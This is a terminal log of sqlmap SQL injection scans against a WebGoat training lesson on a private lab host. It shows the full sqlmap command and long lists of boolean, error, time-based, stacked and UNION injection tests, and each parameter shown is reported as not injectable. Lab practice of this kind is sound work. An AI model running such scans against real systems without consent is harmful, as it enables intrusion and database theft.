[02:34:41] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[02:34:41] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[02:34:41] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[02:34:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:34:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[02:34:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[02:34:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:34:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[02:34:42] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[02:34:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:34:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:34:42] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:34:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:34:43] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[02:34:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:34:43] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[02:34:43] [INFO] testing 'Oracle AND time-based blind'
[02:34:43] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[02:34:43] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'
[02:34:44] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[02:34:44] [INFO] testing 'Informix AND time-based blind (heavy query)'
[02:34:44] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:34:44] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:34:44] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:34:44] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[02:34:44] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[02:34:44] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:34:44] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[02:34:44] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[02:34:44] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[02:34:44] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:34:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:34:44] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[02:34:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:34:45] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[02:34:45] [WARNING] parameter 'Referer' does not seem to be injectable
[02:34:45] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 02:34:45 /2025-05-12/
┌──(kali㉿kali)-[~]
└─$
|
sqlmap -u "http://192.168.128.145:8080/WebGoat/start.mvc?username=user11#lesson/SqlInjectionAdvanced.lesson" --batch --level=3 --risk=2 --dbs
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.128.145:8080/WebGoat/start.mvc?username=user11#lesson/SqlInjectionAdvanced.lesson" --batch --level=3 --risk=2 --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.9.2#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:32:33 /2025-05-12/
[02:32:33] [INFO] testing connection to the target URL
got a 302 redirect to 'http://192.168.128.145:8080/WebGoat/login'. Do you want to follow? [Y/n] Y
you have not declared cookie(s), while server wants to set its own ('JSESSIONID=28CB8E82380...D2145FEA67'). Do you want to use those [Y/n] Y
[02:32:33] [INFO] checking if the target is protected by some kind of WAF/IPS
[02:32:33] [INFO] testing if the target URL content is stable
[02:32:33] [WARNING] GET parameter 'username' does not appear to be dynamic
[02:32:33] [WARNING] heuristic (basic) test shows that GET parameter 'username' might not be injectable
[02:32:33] [INFO] testing for SQL injection on GET parameter 'username'
[02:32:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:32:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:32:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[02:32:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:32:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:32:34] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:32:34] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[02:32:35] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[02:32:35] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:32:35] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[02:32:35] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[02:32:35] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[02:32:35] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[02:32:35] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[02:32:35] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[02:32:35] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[02:32:35] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[02:32:35] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[02:32:35] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[02:32:35] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[02:32:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[02:32:35] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:35] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:35] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[02:32:35] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:35] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[02:32:36] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[02:32:36] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[02:32:36] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:32:36] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:32:36] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:32:37] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:32:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:32:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:32:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[02:32:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[02:32:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:32:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[02:32:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:32:38] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[02:32:38] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[02:32:39] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[02:32:39] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[02:32:39] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:32:39] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:32:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:32:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:32:39] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[02:32:39] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[02:32:39] [INFO] testing 'Oracle error-based - Parameter replace'
[02:32:39] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[02:32:39] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[02:32:39] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[02:32:39] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[02:32:39] [INFO] testing 'Generic inline queries'
[02:32:39] [INFO] testing 'MySQL inline queries'
[02:32:39] [INFO] testing 'PostgreSQL inline queries'
[02:32:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:32:39] [INFO] testing 'Oracle inline queries'
[02:32:39] [INFO] testing 'SQLite inline queries'
[02:32:39] [INFO] testing 'Firebird inline queries'
[02:32:39] [INFO] testing 'ClickHouse inline queries'
[02:32:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:32:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:32:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:32:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:32:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:32:40] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[02:32:40] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[02:32:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:32:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[02:32:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:32:41] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[02:32:41] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[02:32:41] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[02:32:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:32:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[02:32:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[02:32:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:32:41] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[02:32:42] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[02:32:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:32:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:32:42] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:32:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:32:42] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[02:32:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:32:43] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[02:32:43] [INFO] testing 'Oracle AND time-based blind'
[02:32:43] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[02:32:43] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'
[02:32:43] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[02:32:43] [INFO] testing 'Informix AND time-based blind (heavy query)'
[02:32:44] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:32:44] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:32:44] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:32:44] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[02:32:44] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[02:32:44] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:32:44] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[02:32:44] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[02:32:44] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[02:32:44] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[02:32:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:32:44] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[02:32:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:32:45] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[02:32:45] [WARNING] GET parameter 'username' does not seem to be injectable
[02:32:45] [WARNING] parameter 'User-Agent' does not appear to be dynamic
[02:32:45] [WARNING] heuristic (basic) test shows that parameter 'User-Agent' might not be injectable
[02:32:45] [INFO] testing for SQL injection on parameter 'User-Agent'
[02:32:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:32:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:32:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[02:32:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:32:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:32:46] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:32:46] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[02:32:46] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[02:32:46] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:32:46] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[02:32:47] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[02:32:47] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[02:32:47] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[02:32:47] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[02:32:47] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[02:32:47] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[02:32:47] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[02:32:47] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[02:32:47] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[02:32:47] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[02:32:47] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:47] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[02:32:47] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:47] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:47] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[02:32:47] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:47] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[02:32:47] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[02:32:47] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[02:32:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:32:47] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:32:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:32:48] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:32:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:32:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:32:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[02:32:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[02:32:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:32:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[02:32:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:32:49] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[02:32:49] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[02:32:49] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[02:32:49] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[02:32:50] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:32:50] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:32:50] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:32:50] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:32:50] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[02:32:50] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[02:32:50] [INFO] testing 'Oracle error-based - Parameter replace'
[02:32:50] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[02:32:50] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[02:32:50] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[02:32:50] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[02:32:50] [INFO] testing 'Generic inline queries'
[02:32:50] [INFO] testing 'MySQL inline queries'
[02:32:50] [INFO] testing 'PostgreSQL inline queries'
[02:32:50] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:32:50] [INFO] testing 'Oracle inline queries'
[02:32:50] [INFO] testing 'SQLite inline queries'
[02:32:50] [INFO] testing 'Firebird inline queries'
[02:32:50] [INFO] testing 'ClickHouse inline queries'
[02:32:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:32:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:32:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:32:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:32:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:32:51] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[02:32:51] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[02:32:51] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:32:51] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[02:32:51] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:32:51] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[02:32:51] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[02:32:51] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[02:32:51] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:32:51] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[02:32:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[02:32:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:32:52] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[02:32:52] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[02:32:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:32:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:32:52] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:32:53] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:32:53] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[02:32:53] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:32:53] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[02:32:53] [INFO] testing 'Oracle AND time-based blind'
[02:32:53] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[02:32:53] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'
[02:32:53] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[02:32:54] [INFO] testing 'Informix AND time-based blind (heavy query)'
[02:32:54] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:32:54] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:32:54] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:32:54] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[02:32:54] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[02:32:54] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:32:54] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[02:32:54] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[02:32:54] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[02:32:54] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:32:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:32:54] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[02:32:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:32:55] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[02:32:55] [WARNING] parameter 'User-Agent' does not seem to be injectable
[02:32:55] [WARNING] parameter 'Referer' does not appear to be dynamic
[02:32:55] [WARNING] heuristic (basic) test shows that parameter 'Referer' might not be injectable
[02:32:55] [INFO] testing for SQL injection on parameter 'Referer'
[02:32:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:32:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:32:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[02:32:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:32:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:32:56] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:32:56] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[02:32:56] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[02:32:56] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:32:56] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[02:32:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[02:32:57] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[02:32:57] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[02:32:57] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[02:32:57] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[02:32:57] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[02:32:57] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[02:32:57] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[02:32:57] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[02:32:57] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[02:32:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[02:32:57] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:57] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:57] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[02:32:57] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[02:32:57] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[02:32:57] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[02:32:57] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[02:32:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:32:57] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:32:57] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:32:58] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:32:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:32:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:32:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[02:32:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[02:32:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:32:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[02:32:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:32:59] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[02:32:59] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[02:32:59] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[02:32:59] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[02:32:59] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:33:00] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:33:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:33:00] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
